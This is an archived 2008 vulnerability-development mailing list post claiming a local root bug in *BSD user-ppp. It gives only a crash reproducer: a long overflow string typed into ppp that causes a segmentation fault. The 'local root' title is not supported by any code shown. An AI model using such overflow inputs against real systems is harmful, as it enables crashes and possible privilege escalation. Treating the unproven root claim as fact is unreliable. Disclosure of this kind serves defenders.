Vulnerability Development: *BSD user-ppp local root (when conditions permit)

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

*BSD user-ppp local root (when conditions permit)

From: sipherr () gmail com
Date: 29 Feb 2008 16:39:03 -0000

/***********************************************************************************/

/***     pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/

/***     2003 / 12 /23   - PRIVATE CODE                                          ***/

/***     Program terminated with signal 11, Segmentation fault.                  ***/

/***     #0  0xbeefdead in ?? ()                                                 ***/

/***********************************************************************************/


I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)


Steps to reproduce:


1. Run ppp

2. type the following (or atleat some variation of)

~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


This will produce a segmentation violation (Core dumped).


Discovered by: sipher


Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers () dalnet

By Date By Thread

Current thread:

*BSD user-ppp local root (when conditions permit) sipherr (Feb 29)